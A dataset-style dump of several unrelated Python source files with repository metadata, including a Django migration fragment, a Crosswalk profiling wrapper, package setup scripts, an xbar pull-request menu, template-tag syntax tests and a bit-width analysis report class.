            name='forest_block',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='map_ref',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='roadtrack',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='apiarysiteonapproval',
            name='zone',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
    ]
| 0 | 1,994 | 23 |
d4975d812aa56d965dedc021abeae297e292f266 | 1,650 | py | Python | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 2,211 | 2015-01-01T08:50:09.000Z | 2022-03-30T02:48:16.000Z | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 1,269 | 2015-01-02T10:43:16.000Z | 2020-01-17T00:58:09.000Z | build/android/adb_profile_xwalk.py | gaurangkumar/crosswalk | 1b9b80835e83e77390bd6cdbc03beb63f2a6f550 | [
"BSD-3-Clause"
] | 585 | 2015-01-02T01:12:15.000Z | 2022-03-09T07:07:18.000Z | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Copyright (c) 2014 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
chrome_src = os.environ['CHROME_SRC']
chrome_tool_path = os.path.join(chrome_src, 'build', 'android')
sys.path.append(chrome_tool_path)
# Below two modules should be imported at runtime, but pylint can not find it,
# add below pylint attribute to ignore this error.
#
# pylint: disable=F0401
import adb_profile_chrome
from pylib import constants
# Wrapper for package info, the key 'stable' is needed by adb_profile_chrome.
PACKAGE_INFO = {
'xwalk_embedded_shell': constants.PackageInfo(
'org.xwalk.runtime.client.embedded.shell',
'org.xwalk.runtime.client.embedded.shell'
'.XWalkRuntimeClientEmbeddedShellActivity',
'/data/local/tmp/xwview-shell-command-line',
None,
None),
}
if __name__ == '__main__':
sys.exit(main())
| 29.464286 | 78 | 0.749697 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Copyright (c) 2014 Intel Corporation. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
chrome_src = os.environ['CHROME_SRC']
chrome_tool_path = os.path.join(chrome_src, 'build', 'android')
sys.path.append(chrome_tool_path)
# Below two modules should be imported at runtime, but pylint can not find it,
# add below pylint attribute to ignore this error.
#
# pylint: disable=F0401
import adb_profile_chrome
from pylib import constants
# Wrapper for package info, the key 'stable' is needed by adb_profile_chrome.
PACKAGE_INFO = {
'xwalk_embedded_shell': constants.PackageInfo(
'org.xwalk.runtime.client.embedded.shell',
'org.xwalk.runtime.client.embedded.shell'
'.XWalkRuntimeClientEmbeddedShellActivity',
'/data/local/tmp/xwview-shell-command-line',
None,
None),
}
def _GetSupportedBrowsers():
  """Build the browser table used by adb_profile_chrome.

  Starts from the 'stable' alias mapped to the XWalk embedded shell (for
  backwards compatibility), layers Chrome's package table on top, then drops
  entries that are not actual browsers.
  """
  browsers = {'stable': PACKAGE_INFO['xwalk_embedded_shell']}
  browsers.update(constants.PACKAGE_INFO)
  for name in ('content_browsertests', 'gtest', 'legacy_browser'):
    del browsers[name]
  return browsers
def main():
  # Reuse Chrome's profiling CLI, but substitute our browser table so the
  # XWalk packages become selectable.
  adb_profile_chrome._GetSupportedBrowsers = _GetSupportedBrowsers
  adb_profile_chrome.main()
if __name__ == '__main__':
sys.exit(main())
| 449 | 0 | 46 |
97eac6d4984d6c7cf82f679600d677aae6b3f6a2 | 814 | py | Python | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | 4 | 2022-03-12T03:14:12.000Z | 2022-03-23T15:56:14.000Z | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | 2 | 2022-03-16T02:21:08.000Z | 2022-03-29T03:18:59.000Z | setup.py | interactions-py/enhanced | d9799464bdab23c171fe790dd7a763ac9dd92eee | [
"MIT"
] | null | null | null | from setuptools import setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="enhanced",
version="4.0.0",
description="Enhanced interactions for interactions.py",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/interactions-py/enhanced",
author="Toricane",
author_email="prjwl028@gmail.com",
license="MIT",
packages=["interactions.ext.enhanced"],
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"discord-py-interactions>=4.1.1rc.1",
"typing_extensions",
],
)
| 29.071429 | 60 | 0.644963 | from setuptools import setup
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="enhanced",
version="4.0.0",
description="Enhanced interactions for interactions.py",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/interactions-py/enhanced",
author="Toricane",
author_email="prjwl028@gmail.com",
license="MIT",
packages=["interactions.ext.enhanced"],
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
"discord-py-interactions>=4.1.1rc.1",
"typing_extensions",
],
)
| 0 | 0 | 0 |
739a497ac7f435d24ff346cd7c79613e917bdbb4 | 5,308 | py | Python | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | src/python/pull_requests/menu.py | bvdeenen/bitbar | 4bd0876dacecc55f2cb60027510ba47ff7d84d12 | [
"MIT"
] | null | null | null | import itertools
from typing import List, Dict
from .config import PullRequestsConstants
from .domain import PullRequest, PullRequestSort, PullRequestStatus, PullRequestsOverview, PullRequestException
from .notification import send_notification_pr
from ..common.config import get_logger
from ..common.icons import Icon, Icons
from ..common.util import get_absolute_path_to_repo_file
logger = get_logger(__name__)
open_multiple_urls = get_absolute_path_to_repo_file('src/open-multiple-urls.sh')
| 41.795276 | 118 | 0.683685 | import itertools
from typing import List, Dict
from .config import PullRequestsConstants
from .domain import PullRequest, PullRequestSort, PullRequestStatus, PullRequestsOverview, PullRequestException
from .notification import send_notification_pr
from ..common.config import get_logger
from ..common.icons import Icon, Icons
from ..common.util import get_absolute_path_to_repo_file
logger = get_logger(__name__)
open_multiple_urls = get_absolute_path_to_repo_file('src/open-multiple-urls.sh')
def sort_pull_requests(pull_requests: List[PullRequest], sort_on: PullRequestSort):
    """Sort pull requests most-recently-active first, or by title ascending.

    Bug fix: the title branch used subscript access (p['title']) on
    PullRequest objects that are attribute-accessed everywhere else in this
    module (p.activity, p.slug, p.title), which raised TypeError whenever
    sort_on was not PullRequestSort.ACTIVITY.
    """
    if sort_on == PullRequestSort.ACTIVITY:
        return sorted(pull_requests, key=lambda p: p.activity, reverse=True)
    return sorted(pull_requests, key=lambda p: p.title)
def determine_repo_status(prs_list: List[PullRequest]):
    """Collapse the statuses of one repository's PRs into a single status.

    Priority: any rejection wins; otherwise any unapproved/no-vote PR marks
    the repo unapproved; otherwise any needs-work/waiting-for-author PR marks
    it needs-work; otherwise the repo counts as approved.
    """
    statuses = [pr.overall_status for pr in prs_list]
    if PullRequestStatus.REJECTED in statuses:
        return PullRequestStatus.REJECTED
    if any(s in (PullRequestStatus.UNAPPROVED, PullRequestStatus.NO_VOTE) for s in statuses):
        return PullRequestStatus.UNAPPROVED
    if any(s in (PullRequestStatus.NEEDS_WORK, PullRequestStatus.WAITING_FOR_AUTHOR) for s in statuses):
        return PullRequestStatus.NEEDS_WORK
    # Remaining statuses are approved / approved-with-suggestions.
    return PullRequestStatus.APPROVED
def print_prs(
        pr_type,
        pull_requests: List[PullRequest],
        sort_on: PullRequestSort,
        section_icon: Icon,
        status_icons: Dict[PullRequestStatus, Icon]):
    """Render one xbar menu section (e.g. 'Reviewing' / 'Authored'), grouping
    the PRs by repository and, within a repository, by target branch."""
    print(f"{pr_type} | templateImage={section_icon.base64_image}")
    print("---")
    # itertools.groupby only groups consecutive items, so sort by the key first.
    prs_sorted_by_slug = sorted(pull_requests, key=lambda p: p.slug)
    for repo, repo_prs in itertools.groupby(prs_sorted_by_slug, key=lambda p: p.slug):
        repo_prs_list: List[PullRequest] = list(repo_prs)
        repo_status = determine_repo_status(repo_prs_list)
        repo_href = repo_prs_list[0].all_prs_href
        print(f"{repo} ({str(len(repo_prs_list))}) | href={repo_href} image={status_icons[repo_status].base64_image}")
        prs_sorted_by_to_ref = sorted(repo_prs_list, key=lambda p: p.to_ref)
        pr_urls = list()
        for to_ref, to_ref_prs in itertools.groupby(prs_sorted_by_to_ref, key=lambda p: p.to_ref):
            to_ref_prs_list: List[PullRequest] = sort_pull_requests(list(to_ref_prs), sort_on)
            # '--' prefixes create xbar sub-menu entries.
            print(f"--{to_ref}")
            for _pr in to_ref_prs_list:
                print(f"--{_pr.from_ref} -- {_pr.title} (#{_pr.id}) - {_pr.time_ago}" +
                      f"|href={_pr.href} image={status_icons[_pr.overall_status].base64_image}")
                pr_urls.append(_pr.href)
        # Alternate click (option click to open all)
        print(
            (f"{repo} (open {str(len(repo_prs_list))} PRs) |"
             "alternate=true "
             f"image={status_icons[repo_status].base64_image} "
             f"bash={open_multiple_urls} param1='{' '.join(pr_urls)}' "
             "terminal=false"
            )
        )
def print_xbar_pull_request_menu(
        pr_overview: PullRequestsOverview,
        pr_statuses: Dict[PullRequestStatus, Icon],
        sort_on: PullRequestSort,
        cache_file: str,
        notifications_enabled: bool
):
    """Render the complete xbar menu: the menu-bar PR count, 'Reviewing' and
    'Authored' sections, any collected errors, and (optionally) desktop
    notifications computed by diffing against the cached previous overview."""
    total_prs_to_review = len(pr_overview.prs_to_review)
    total_prs_authored_with_work = len(pr_overview.prs_authored_with_work)
    total_prs = total_prs_to_review + total_prs_authored_with_work
    if total_prs > 0:
        # Menu-bar title: total open PR count.
        print(f"{str(total_prs)} | templateImage={Icons.PULL_REQUEST.base64_image}")
        if total_prs_to_review > 0:
            print("---")
            print_prs("Reviewing", pr_overview.prs_to_review, sort_on, Icons.REVIEW, pr_statuses)
        if total_prs_authored_with_work > 0:
            print("---")
            print_prs("Authored", pr_overview.prs_authored_with_work, sort_on, Icons.AUTHORED, pr_statuses)
        if len(pr_overview.exceptions) > 0:
            print_and_log_exceptions(pr_overview.exceptions)
        if notifications_enabled:
            # Notify only about the delta relative to the previous run's cache.
            previous_pr_status = PullRequestsOverview.load_cached(cache_file)
            new, changed = pr_overview.determine_new_and_changed_pull_requests_to_review(previous_pr_status)
            for pr in new:
                send_notification_pr("New", pr.slug, pr.from_ref, pr.to_ref, pr.title, pr.href)
            for pr in changed:
                send_notification_pr("Changed", pr.slug, pr.from_ref, pr.to_ref, pr.title, pr.href)
        pr_overview.store(cache_file)
    elif total_prs == 0 and len(pr_overview.exceptions) == 0:
        print(f"0 | templateImage={Icons.PULL_REQUEST.base64_image}")
        print("---")
        print(f"Nothing to review 🎉 | templateImage={PullRequestsConstants.NO_PULL_REQUESTS.base64_image}")
        pr_overview.store(cache_file)
    else:
        # Nothing fetched and errors occurred: show '?' plus the error details.
        print(f"? | templateImage={Icons.PULL_REQUEST.base64_image}")
        print_and_log_exceptions(pr_overview.exceptions)
def print_and_log_exceptions(exceptions: List[PullRequestException]):
    """Log every collected exception (message and traceback) and render each
    one as an xbar menu entry."""
    for exc in exceptions:
        logger.error(exc.exception)
        logger.error(exc.traceback)
        print("---")
        print(f"{exc.source} error: {exc.message}")
| 4,695 | 0 | 115 |
fda7626c94b77811ec4a56e243a28182a9495ac4 | 4,598 | py | Python | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | tests/posts_templatetags/tests.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.test import SimpleTestCase
from yepes.test_mixins import TemplateTagsMixin
from marchena.modules.posts.templatetags.posts import (
CalendarTag,
GetArchivesTag,
GetCategoryTag,
GetCategoriesTag,
GetNextPostTag,
GetPopularPostsTag,
GetPostTag,
GetPostsTag,
GetPreviousPostTag,
GetRecentPostsTag,
GetRelatedPostsTag,
GetTagTag,
GetTagsTag,
LastModificationTag,
LastPublicationTag,
NextPostLinkTag,
PostAuthorsTag,
PostCategoriesTag,
PostTagsTag,
PreviousPostLinkTag,
TagCloudTag,
)
| 28.036585 | 115 | 0.597434 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.test import SimpleTestCase
from yepes.test_mixins import TemplateTagsMixin
from marchena.modules.posts.templatetags.posts import (
CalendarTag,
GetArchivesTag,
GetCategoryTag,
GetCategoriesTag,
GetNextPostTag,
GetPopularPostsTag,
GetPostTag,
GetPostsTag,
GetPreviousPostTag,
GetRecentPostsTag,
GetRelatedPostsTag,
GetTagTag,
GetTagsTag,
LastModificationTag,
LastPublicationTag,
NextPostLinkTag,
PostAuthorsTag,
PostCategoriesTag,
PostTagsTag,
PreviousPostLinkTag,
TagCloudTag,
)
class PostsTagsTest(TemplateTagsMixin, SimpleTestCase):
requiredLibraries = ['posts']
def test_calendar_syntax(self):
self.checkSyntax(
CalendarTag,
'{% calendar[ year[ month[ user]]] %}',
)
def test_get_archives_syntax(self):
self.checkSyntax(
GetArchivesTag,
'{% get_archives[ period[ user[ ordering]]][ as variable_name] %}',
)
def test_get_category_syntax(self):
self.checkSyntax(
GetCategoryTag,
'{% get_category category_slug[ blog][ as variable_name] %}',
)
def test_get_categories_syntax(self):
self.checkSyntax(
GetCategoriesTag,
'{% get_categories *category_slugs[ blog][ as variable_name] %}',
)
def test_get_next_post_syntax(self):
self.checkSyntax(
GetNextPostTag,
'{% get_next_post[ post[ user[ in_same_blog]]][ as variable_name] %}',
)
def test_get_popular_posts_syntax(self):
self.checkSyntax(
GetPopularPostsTag,
'{% get_popular_posts[ limit[ user[ author[ blog[ category[ tag[ days]]]]]]][ as variable_name] %}',
)
def test_get_post_syntax(self):
self.checkSyntax(
GetPostTag,
'{% get_post post_id[ as variable_name] %}',
)
def test_get_posts_syntax(self):
self.checkSyntax(
GetPostsTag,
'{% get_posts[ limit[ user[ ordering[ author[ blog[ category[ tag[ days]]]]]]]][ as variable_name] %}',
)
def test_get_previous_post_syntax(self):
self.checkSyntax(
GetPreviousPostTag,
'{% get_previous_post[ post[ user[ in_same_blog]]][ as variable_name] %}',
)
def test_get_recent_posts_syntax(self):
self.checkSyntax(
GetRecentPostsTag,
'{% get_recent_posts[ limit[ user[ author[ blog[ category[ tag]]]]]][ as variable_name] %}',
)
def test_get_related_posts_syntax(self):
self.checkSyntax(
GetRelatedPostsTag,
'{% get_related_posts[ post[ limit[ in_same_blog]]][ as variable_name] %}',
)
def test_get_tag_syntax(self):
self.checkSyntax(
GetTagTag,
'{% get_tag tag_slug[ as variable_name] %}',
)
def test_get_tags_syntax(self):
self.checkSyntax(
GetTagsTag,
'{% get_tags *tag_slugs[ as variable_name] %}',
)
def test_last_modification_syntax(self):
self.checkSyntax(
LastModificationTag,
'{% last_modification[ format[ user]] %}',
)
def test_last_publication_syntax(self):
self.checkSyntax(
LastPublicationTag,
'{% last_publication[ format[ user]] %}',
)
def test_next_post_link_syntax(self):
self.checkSyntax(
NextPostLinkTag,
'{% next_post_link[ format[ link[ post[ user[ in_same_blog]]]]] %}',
)
def test_post_authors_syntax(self):
self.checkSyntax(
PostAuthorsTag,
'{% post_authors[ separator[ last_separator[ post]]][ as variable_name] %}',
)
    def test_post_categories_syntax(self):
        """PostCategoriesTag must accept exactly its documented syntax."""
        self.checkSyntax(
            PostCategoriesTag,
            '{% post_categories[ separator[ last_separator[ post]]][ as variable_name] %}',
        )
    def test_post_tags_syntax(self):
        """PostTagsTag must accept exactly its documented syntax."""
        self.checkSyntax(
            PostTagsTag,
            '{% post_tags[ separator[ last_separator[ post]]][ as variable_name] %}',
        )
    def test_previous_post_link_syntax(self):
        """PreviousPostLinkTag must accept exactly its documented syntax."""
        self.checkSyntax(
            PreviousPostLinkTag,
            '{% previous_post_link[ format[ link[ post[ user[ in_same_blog]]]]] %}',
        )
    def test_tag_cloud_syntax(self):
        """TagCloudTag must accept exactly its documented syntax."""
        self.checkSyntax(
            TagCloudTag,
            '{% tag_cloud[ limit] %}',
        )
| 3,295 | 636 | 23 |
a6745ce4b94e00cc9b78ece31861fa3b258dc893 | 1,740 | py | Python | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 113 | 2017-10-15T23:22:02.000Z | 2022-01-22T19:33:39.000Z | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 39 | 2017-10-02T18:23:33.000Z | 2021-01-10T03:02:43.000Z | setup.py | ysuter/DeepNeuro | f6a4a9d0960c696fb73dfcc1093bfd8496b0b6ed | [
"MIT"
] | 39 | 2017-10-15T23:22:05.000Z | 2021-08-31T14:02:56.000Z | """DeepNeuro: A deep learning python package for neuroimaging data.
Created by the Quantitative Tumor Imaging Lab at the Martinos Center
(Harvard-MIT Program in Health, Sciences, and Technology / Massachussets General Hospital).
"""
# The first docstring line doubles as the short package description below.
DOCLINES = __doc__.split("\n")
import sys
from setuptools import setup, find_packages
# NOTE(review): `open` and `path` are imported but never used in this script.
from codecs import open
from os import path
import os
# Point matplotlib's config/cache directory at the build directory so the
# build does not touch (or fail on a read-only) home directory.
os.environ["MPLCONFIGDIR"] = "."
# Hard requirement: the package uses Python 3.5+ features.
if sys.version_info[:2] < (3, 5):
    raise RuntimeError("Python version 3.5 or greater required.")
setup(
    name='deepneuro',
    version='0.2.3',
    description=DOCLINES[0],
    packages=find_packages(),
    # Console entry points: one CLI per shipped pipeline.
    entry_points= {
        "console_scripts": ['segment_gbm = deepneuro.pipelines.Segment_GBM.cli:main',
                            'skull_stripping = deepneuro.pipelines.Skull_Stripping.cli:main',
                            'segment_mets = deepneuro.pipelines.Segment_Brain_Mets.cli:main',
                            'segment_ischemic_stroke = deepneuro.pipelines.Ischemic_Stroke.cli:main'],
    },
    author='Andrew Beers',
    author_email='abeers@mgh.harvard.edu',
    url='https://github.com/QTIM-Lab/DeepNeuro', # use the URL to the github repo
    download_url='https://github.com/QTIM-Lab/DeepNeuro/tarball/0.2.3',
    keywords=['neuroimaging', 'neuroncology', 'neural networks', 'neuroscience', 'neurology', 'deep learning', 'fmri', 'pet', 'mri', 'dce', 'dsc', 'dti', 'machine learning', 'computer vision', 'learning', 'keras', 'theano', 'tensorflow', 'nifti', 'nrrd', 'dicom'],
    install_requires=['tables', 'pydicom', 'pynrrd', 'nibabel', 'pyyaml', 'six', 'imageio', 'matplotlib', 'pydot', 'scipy', 'numpy', 'scikit-image', 'imageio', 'tqdm'],
    classifiers=[],
)
| 42.439024 | 262 | 0.659195 | """DeepNeuro: A deep learning python package for neuroimaging data.
Created by the Quantitative Tumor Imaging Lab at the Martinos Center
(Harvard-MIT Program in Health, Sciences, and Technology / Massachussets General Hospital).
"""
DOCLINES = __doc__.split("\n")
import sys
from setuptools import setup, find_packages
from codecs import open
from os import path
import os
os.environ["MPLCONFIGDIR"] = "."
if sys.version_info[:2] < (3, 5):
raise RuntimeError("Python version 3.5 or greater required.")
setup(
name='deepneuro',
version='0.2.3',
description=DOCLINES[0],
packages=find_packages(),
entry_points= {
"console_scripts": ['segment_gbm = deepneuro.pipelines.Segment_GBM.cli:main',
'skull_stripping = deepneuro.pipelines.Skull_Stripping.cli:main',
'segment_mets = deepneuro.pipelines.Segment_Brain_Mets.cli:main',
'segment_ischemic_stroke = deepneuro.pipelines.Ischemic_Stroke.cli:main'],
},
author='Andrew Beers',
author_email='abeers@mgh.harvard.edu',
url='https://github.com/QTIM-Lab/DeepNeuro', # use the URL to the github repo
download_url='https://github.com/QTIM-Lab/DeepNeuro/tarball/0.2.3',
keywords=['neuroimaging', 'neuroncology', 'neural networks', 'neuroscience', 'neurology', 'deep learning', 'fmri', 'pet', 'mri', 'dce', 'dsc', 'dti', 'machine learning', 'computer vision', 'learning', 'keras', 'theano', 'tensorflow', 'nifti', 'nrrd', 'dicom'],
install_requires=['tables', 'pydicom', 'pynrrd', 'nibabel', 'pyyaml', 'six', 'imageio', 'matplotlib', 'pydot', 'scipy', 'numpy', 'scikit-image', 'imageio', 'tqdm'],
classifiers=[],
)
| 0 | 0 | 0 |
fb1a8e971ff4bcd9956b2507666420e60420eb72 | 960 | py | Python | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | coralquant/spider/bs_sz50_stocks.py | dabuc/CoralQuant | 26ba2e0b39a897d8947166796c6a4e9f5ab202fa | [
"MIT"
] | null | null | null | from coralquant.models.odl_model import BS_SZ50_Stocks
import baostock as bs
import pandas as pd
from sqlalchemy import String
from coralquant.database import engine
from coralquant.settings import CQ_Config
def get_sz50_stocks():
    """Fetch the current SSE 50 index constituents via baostock and append
    them to the ``odl_bs_sz50_stocks`` table (schema ``CQ_Config.DB_SCHEMA``).
    Existing rows are deleted first so the table always holds one snapshot.
    """
    # Wipe the previously stored constituent list before refetching.
    BS_SZ50_Stocks.del_all_data()
    # Open a baostock session and echo its status for the operator.
    session = bs.login()
    print('login respond error_code:' + session.error_code)
    print('login respond error_msg:' + session.error_msg)
    # Request the SSE 50 membership and echo the query status.
    result_set = bs.query_sz50_stocks()
    print('query_sz50 error_code:' + result_set.error_code)
    print('query_sz50 error_msg:' + result_set.error_msg)
    # Drain the result cursor row by row into a plain list.
    rows = []
    while (result_set.error_code == '0') & result_set.next():
        rows.append(result_set.get_row_data())
    frame = pd.DataFrame(rows, columns=result_set.fields)
    frame.to_sql('odl_bs_sz50_stocks', engine, schema=CQ_Config.DB_SCHEMA, if_exists='append', index=False)
    # Close the baostock session.
    bs.logout()
import baostock as bs
import pandas as pd
from sqlalchemy import String
from coralquant.database import engine
from coralquant.settings import CQ_Config
def get_sz50_stocks():
"""
获取上证50成分股数据
"""
#删除数据
BS_SZ50_Stocks.del_all_data()
# 登陆系统
lg = bs.login()
# 显示登陆返回信息
print('login respond error_code:' + lg.error_code)
print('login respond error_msg:' + lg.error_msg)
# 获取上证50成分股
rs = bs.query_sz50_stocks()
print('query_sz50 error_code:'+rs.error_code)
print('query_sz50 error_msg:'+rs.error_msg)
# 打印结果集
sz50_stocks = []
while (rs.error_code == '0') & rs.next():
# 获取一条记录,将记录合并在一起
sz50_stocks.append(rs.get_row_data())
result = pd.DataFrame(sz50_stocks, columns=rs.fields)
result.to_sql('odl_bs_sz50_stocks', engine, schema=CQ_Config.DB_SCHEMA, if_exists='append', index=False)
# 登出系统
bs.logout() | 0 | 0 | 0 |
7eee30bb582ba5ab6b61fd5ba6e6d77feca738b4 | 235 | py | Python | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 959 | 2017-07-23T11:30:24.000Z | 2022-03-30T14:10:55.000Z | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 335 | 2017-07-22T07:22:46.000Z | 2022-03-24T13:09:15.000Z | pyswarms/utils/search/__init__.py | goncalogteixeira/pyswarns | c18d61e40f582e54a3a23f0b55c1fff43ec6a5bd | [
"MIT"
] | 363 | 2017-07-25T01:58:23.000Z | 2022-03-28T17:19:11.000Z | """
The :mod:`pyswarms.utils.search` module implements various techniques in
hyperparameter value optimization.
"""
from .grid_search import GridSearch
from .random_search import RandomSearch
__all__ = ["GridSearch", "RandomSearch"]
| 23.5 | 72 | 0.791489 | """
The :mod:`pyswarms.utils.search` module implements various techniques in
hyperparameter value optimization.
"""
from .grid_search import GridSearch
from .random_search import RandomSearch
__all__ = ["GridSearch", "RandomSearch"]
| 0 | 0 | 0 |
d2739cc17fbb8439caf847f29094b14cd0a43ae8 | 3,203 | py | Python | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | analysis_data/AnalysisResult.py | solmannn/alu | 1e31b8a39a4718f32b4a8d3f5614553744fd2aad | [
"MIT"
] | null | null | null | # -------------------------------------------------------------------------------
# Copyright 2018-2020, Christian Pilato <christian.pilato@polimi.it>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
| 61.596154 | 291 | 0.55167 | # -------------------------------------------------------------------------------
# Copyright 2018-2020, Christian Pilato <christian.pilato@polimi.it>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------------
class AnalysisBits():
    """Per-module tally of analyzed constructs and their bit widths.

    All counters start at zero and are incremented by the analysis pass:
    ``num_*`` counts occurrences, ``bits_*`` accumulates their bit widths.
    """

    def __init__(self, name):
        """Create an empty tally for the module called *name*."""
        self.module = name
        # occurrence count / accumulated bit width, one pair per construct kind
        self.num_constants = 0
        self.bits_constants = 0
        self.num_branches = 0
        self.bits_branches = 0
        self.num_operations = 0
        self.bits_operations = 0
class AnalysisResult:
    """Aggregated bit-width analysis for a design: the transformed top-level
    module plus one :class:`AnalysisBits` record per analyzed module."""
    def __init__(self):
        # NOTE(review): top_output is presumably the rewritten top module and
        # must expose .module_name and .name before write_analysis() runs —
        # calling write_analysis() while it is still None raises AttributeError.
        self.top_output = None
        self.modules = {}  # module name -> AnalysisBits
        self.list_files = []  # generated output files (not used in this class)
    def write_analysis(self, cfg):
        """Pretty-print the per-module bit statistics to stdout.

        ``cfg`` is accepted for interface compatibility but is not used here.
        The two passes below first compute column widths so that the numeric
        fields are right-aligned across all modules.
        """
        print("------------------------------------------------------------------------------------")
        print("| Original module = \"" + self.top_output.module_name + "\"")
        print("| Output module   = \"" + self.top_output.name + "\"")
        print("------------------------------------------------------------------------------------")
        # First pass: widest count / widest bit total over all modules.
        spaces = 0
        spaces_bits = 0
        for n in self.modules:
            spaces = max(spaces, len(str(self.modules[n].num_constants)), len(str(self.modules[n].num_branches)), len(str(self.modules[n].num_operations)))
            spaces_bits = max(spaces_bits, len(str(self.modules[n].bits_constants)), len(str(self.modules[n].bits_branches)), len(str(self.modules[n].bits_operations)))
        # Second pass: emit one aligned report section per module.
        for n in self.modules:
            print("- Module = " + n)
            print("|- Number of bits for constants  = " + ' ' * (spaces - len(str(self.modules[n].num_constants))) + str(self.modules[n].num_constants) + " CONSTANTS / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_constants))) + str(self.modules[n].bits_constants) + " BITS")
            print("|- Number of bits for branches   = " + ' ' * (spaces - len(str(self.modules[n].num_branches))) + str(self.modules[n].num_branches) + " BRANCHES / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_branches))) + str(self.modules[n].bits_branches) + " BITS")
            print("|- Number of bits for operations = " + ' ' * (spaces - len(str(self.modules[n].num_operations))) + str(self.modules[n].num_operations) + " OPERATIONS / " + ' ' * (spaces_bits - len(str(self.modules[n].bits_operations))) + str(self.modules[n].bits_operations) + " BITS")
            print("|- Total number of bits (module) = " + str(self.modules[n].bits_constants + self.modules[n].bits_branches + self.modules[n].bits_operations))
            print("------------------------------------------------------------------------------------")
| 2,299 | 0 | 125 |
0f1c48a7f94fc42da2ea79d6bd12b1264ea44199 | 313 | py | Python | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | 1 | 2017-11-30T17:25:08.000Z | 2017-11-30T17:25:08.000Z | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | null | null | null | labs/04_conv_nets_2/solutions/geom_avg.py | souillade/Deep | 3d79384638220376deb7c4c656cfb9cc497998ad | [
"MIT"
] | null | null | null | heatmap_1_r = imresize(heatmap_1, (50,80)).astype("float32")
